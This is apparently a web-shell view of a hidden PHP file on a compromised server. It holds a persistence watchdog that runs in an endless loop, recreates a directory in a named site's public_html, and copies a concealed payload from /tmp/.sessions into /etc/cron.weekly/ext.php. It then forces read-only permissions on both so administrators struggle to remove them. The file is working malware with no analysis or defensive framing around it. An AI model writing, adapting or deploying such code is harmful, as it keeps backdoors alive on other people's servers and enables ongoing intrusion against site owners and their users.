| Current Path : /proc/self/root/tmp/.sessions/ |
| Current File : //proc/self/root/tmp/.sessions/.L2V0Yy9jcm9uLndlZWtseWV4dC1oYW5kbGVy |
<?php
@ini_set("max_execution_time", 0);
while (True){
if (!file_exists("/home/shopalmacgroup/app/public_html/pub")){
mkdir("/home/shopalmacgroup/app/public_html/pub");
}
if (!file_exists("/etc/cron.weekly/ext.php")){
$text = base64_encode(file_get_contents("/tmp/.sessions/.L2V0Yy9jcm9uLndlZWtseWV4dC10ZXh0"));
file_put_contents("/etc/cron.weekly/ext.php", base64_decode($text));
}
if (gecko_perm("/etc/cron.weekly/ext.php") != 0444){
chmod("/etc/cron.weekly/ext.php", 0444);
}
if (gecko_perm("/home/shopalmacgroup/app/public_html/pub") != 0555){
chmod("/home/shopalmacgroup/app/public_html/pub", 0555);
}
}
function gecko_perm($flename){
return substr(sprintf("%o", fileperms($flename)), -4);
}